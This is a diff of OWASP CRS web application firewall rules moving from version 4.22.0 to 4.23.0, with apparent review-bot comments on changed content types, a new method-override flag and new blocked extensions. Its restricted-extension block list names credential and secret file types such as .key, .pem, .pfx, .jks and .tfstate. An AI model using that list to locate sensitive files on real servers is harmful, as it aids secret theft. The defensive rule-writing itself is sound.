@@ -109,7 +109,7 @@ SecRule &TX:early_blocking "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.early_blocking=0'" # Default Blocking Paranoia Level (rule 900000 in crs-setup.conf) @@ -119,7 +119,7 @@ SecRule &TX:blocking_paranoia_level "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_paranoia_level=1'" # Default Detection Paranoia Level (rule 900001 in crs-setup.conf) @@ -129,7 +129,7 @@ SecRule &TX:detection_paranoia_level "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'" # Default Sampling Percentage (rule 900400 in crs-setup.conf) @@ -139,7 +139,7 @@ SecRule &TX:sampling_percentage "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.sampling_percentage=100'" # Default Anomaly Scores (rule 900100 in crs-setup.conf) @@ -149,7 +149,7 @@ SecRule &TX:critical_anomaly_score "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.critical_anomaly_score=5'" SecRule &TX:error_anomaly_score "@eq 0" \ @@ -158,7 +158,7 @@ SecRule &TX:error_anomaly_score "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.error_anomaly_score=4'" SecRule &TX:warning_anomaly_score "@eq 0" \ @@ -167,7 +167,7 @@ SecRule &TX:warning_anomaly_score "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.warning_anomaly_score=3'" SecRule &TX:notice_anomaly_score "@eq 0" \ @@ -176,7 +176,7 @@ SecRule &TX:notice_anomaly_score "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.notice_anomaly_score=2'" # Default HTTP policy: allowed_methods (rule 900200 in crs-setup.conf) 
@@ -186,7 +186,7 @@ SecRule &TX:allowed_methods "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" # Default HTTP policy: allowed_request_content_type (rule 900220 in crs-setup.conf) @@ -196,8 +196,8 @@ SecRule &TX:allowed_request_content_type "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ - setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/reports+json| |application/csp-report|'" + ver:'OWASP_CRS/4.23.0',\ + setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |text/xml| |application/xml| |application/soap+xml| |application/json|'" # Default HTTP policy: allowed_request_content_type_charset (rule 900280 in crs-setup.conf) SecRule &TX:allowed_request_content_type_charset "@eq 0" \ @@ -206,7 +206,7 @@ SecRule &TX:allowed_request_content_type_charset "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'" # Default HTTP policy: allowed_http_versions (rule 900230 in crs-setup.conf) @@ -216,7 +216,7 @@ SecRule &TX:allowed_http_versions "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'" # Default HTTP policy: restricted_extensions (rule 900240 in crs-setup.conf) 
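Review bot: The default `tx.allowed_request_content_type` loses `|application/reports+json|` and `|application/csp-report|`, so a deployment that relied on the shipped default to accept browser CSP violation reports or Reporting API posts will start rejecting them after upgrading, even though the surrounding hunks are version bumps. Nothing in the hunk points operators at the change; make sure the changelog and the 900220 comment in crs-setup.conf call it out and show how to add the two types back for a reporting endpoint. If the removal is meant as hardening (a report endpoint is better served by an explicit per-site allow-list than by a global default), a short comment above the rule saying so would stop the next reader from treating it as an accidental drop.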
@@ -226,8 +226,8 @@ SecRule &TX:restricted_extensions "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ - setvar:'tx.restricted_extensions=.ani/ .asa/ .asax/ .ascx/ .back/ .backup/ .bak/ .bck/ .bk/ .bkp/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .cnf/ .com/ .compositefont/ .config/ .conf/ .copy/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .sav/ .save/ .scr/ .sct/ .sh/ .shs/ .sql/ .sqlite/ .sqlite3/ .swp/ .sys/ .temp/ .tlb/ .tmp/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/'" + ver:'OWASP_CRS/4.23.0',\ + setvar:'tx.restricted_extensions=.ani/ .asa/ .asax/ .ascx/ .back/ .backup/ .bak/ .bck/ .bk/ .bkp/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .cnf/ .com/ .compositefont/ .config/ .conf/ .copy/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jks/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .sav/ .save/ .scr/ .sct/ .sh/ .shs/ .sql/ .sqlite/ .sqlite3/ .swap/ .swo/ .swp/ .sys/ .temp/ .tfstate/ .tlb/ .tmp/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/'" # Default HTTP policy: restricted_headers_basic (rule 900250 in crs-setup.conf) SecRule &TX:restricted_headers_basic "@eq 0" \ 
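Review bot: The four new entries `.jks/`, `.swap/`, `.swo/` and `.tfstate/` are placed in sorted position, but the list is documented as mirroring rule 900240 in crs-setup.conf (per the comment line above the rule), so that comment needs the same additions or the two lists drift; confirm the example file is updated in this change. Editor swap coverage is now `.swo/ .swp/`; vim falls through to `.swn` and further letters when those two already exist, so `.swn/` is a natural companion (a defensive addition, not something this hunk breaks).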
@@ -236,7 +236,7 @@ SecRule &TX:restricted_headers_basic "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/ /x-middleware-subrequest/ /expect/'" # Default HTTP policy: restricted_headers_extended (rule 900255 in crs-setup.conf) @@ -246,9 +246,28 @@ SecRule &TX:restricted_headers_extended "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.restricted_headers_extended=/accept-charset/'" +# +# -=[ Method Override Parameter Configuration ]=- +# +# Initialize the allow_method_override_parameter variable. +# This controls whether the _method parameter is permitted for HTTP method +# override (used by frameworks like Laravel, Rails, Symfony). +# +# To allow _method parameter, set tx.allow_method_override_parameter=1 +# in crs-setup.conf (see rule 900510). +# +SecRule &TX:allow_method_override_parameter "@eq 0" \ + "id:901510,\ + phase:1,\ + pass,\ + nolog,\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/4.23.0',\ + setvar:'tx.allow_method_override_parameter=0'" + # Default enforcing of body processor URLENCODED (rule 900010 in crs-setup.conf) SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \ "id:901167,\ @@ -256,7 +275,7 @@ SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.enforce_bodyproc_urlencoded=0'" # Default check for UTF8 encoding validation (rule 900950 in crs-setup.conf) @@ -266,7 +285,7 @@ SecRule &TX:crs_validate_utf8_encoding "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.crs_validate_utf8_encoding=0'" # Default check for skipping response analysis (rule 900500 in crs-setup.conf) 
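Review bot: The new 901510 block is introduced with a banner (`-=[ Method Override Parameter Configuration ]=-`) and a ten-line comment, whereas every neighbouring default in this file uses the one-line form, e.g. `# Default enforcing of body processor URLENCODED (rule 900010 in crs-setup.conf)` directly below it. For consistency, `# Default method override parameter handling (rule 900510 in crs-setup.conf)` plus one line naming the frameworks would match the file's style. The comment also says what the flag controls but not which rule reads `tx.allow_method_override_parameter`; adding that rule id would let a reader jump to the enforcement point.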
@@ -276,7 +295,7 @@ SecRule &TX:crs_skip_response_analysis "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.crs_skip_response_analysis=0'" # @@ -294,7 +313,7 @@ SecAction \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=0',\ setvar:'tx.detection_inbound_anomaly_score=0',\ setvar:'tx.inbound_anomaly_score_pl1=0',\ @@ -336,7 +355,7 @@ SecRule &TX:ENABLE_DEFAULT_COLLECTIONS "@eq 1" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.ua_hash=%{REQUEST_HEADERS.User-Agent}',\ chain" SecRule TX:ENABLE_DEFAULT_COLLECTIONS "@eq 1" \ @@ -362,7 +381,7 @@ SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ msg:'Enabling body inspection',\ tag:'OWASP_CRS',\ ctl:forceRequestBodyVariable=On,\ - ver:'OWASP_CRS/4.22.0'" + ver:'OWASP_CRS/4.23.0'" # Force body processor URLENCODED SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ @@ -374,7 +393,7 @@ SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ noauditlog,\ msg:'Enabling forced body inspection for ASCII content',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ chain" SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ "ctl:requestBodyProcessor=URLENCODED" @@ -414,7 +433,7 @@ SecRule TX:sampling_percentage "@eq 100" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-SAMPLING" SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ @@ -425,7 +444,7 @@ SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ t:sha1,t:hexEncode,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'" # 
@@ -450,7 +469,7 @@ SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \ msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\ tag:'OWASP_CRS',\ ctl:ruleRemoveByTag=OWASP_CRS,\ - ver:'OWASP_CRS/4.22.0'" + ver:'OWASP_CRS/4.23.0'" SecMarker "END-SAMPLING" @@ -469,4 +488,4 @@ SecRule TX:detection_paranoia_level "@lt %{tx.blocking_paranoia_level}" \ log,\ msg:'Detection paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0'" + ver:'OWASP_CRS/4.23.0'" diff --git a/rules/REQUEST-905-COMMON-EXCEPTIONS.conf b/rules/REQUEST-905-COMMON-EXCEPTIONS.conf index 42a5d9cdde..1c3b2a31c5 100644 --- a/rules/REQUEST-905-COMMON-EXCEPTIONS.conf +++ b/rules/REQUEST-905-COMMON-EXCEPTIONS.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -25,7 +25,7 @@ SecRule REQUEST_LINE "@streq GET /" \ tag:'platform-apache',\ tag:'attack-generic',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ chain" SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ "t:none,\ @@ -46,7 +46,7 @@ SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ tag:'platform-apache',\ tag:'attack-generic',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ chain" SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \ "t:none,\ diff --git a/rules/REQUEST-911-METHOD-ENFORCEMENT.conf b/rules/REQUEST-911-METHOD-ENFORCEMENT.conf index 9c5d377434..ec11c111fc 100644 --- a/rules/REQUEST-911-METHOD-ENFORCEMENT.conf +++ b/rules/REQUEST-911-METHOD-ENFORCEMENT.conf 
@@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # 
@@ -39,31 +39,31 @@ SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/METHOD-ENFORCEMENT',\ tag:'capec/1000/210/272/220/274',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule 
TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-913-SCANNER-DETECTION.conf b/rules/REQUEST-913-SCANNER-DETECTION.conf index 240989225c..a801a31200 100644 --- a/rules/REQUEST-913-SCANNER-DETECTION.conf +++ b/rules/REQUEST-913-SCANNER-DETECTION.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # 
@@ -51,29 +51,29 @@ SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/SCANNER-DETECTION',\ tag:'capec/1000/118/224/541/310',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule 
TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf index f116f6652c..29de94d410 100644 --- a/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf +++ b/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -23,8 +23,8 @@ # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # 
@@ -65,7 +65,7 @@ SecRule REQUEST_LINE "!@rx (?i)^(?:get /[^#\?]*(?:\?[^\s\x0b#]*)?(?:#[^\s\x0b]*) tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" @@ -121,7 +121,7 @@ SecRule FILES|FILES_NAMES "!@rx (?i)^(?:&(?:(?:[acegilnorsuz]acut|[aeiou]grav|[a tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -151,7 +151,7 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -186,7 +186,7 @@ SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:Content-Length "!@rx ^0?$" \ @@ -212,7 +212,7 @@ SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \ @@ -253,7 +253,7 @@ SecRule REQUEST_PROTOCOL "!@within HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ chain" SecRule REQUEST_METHOD "@streq POST" \ 
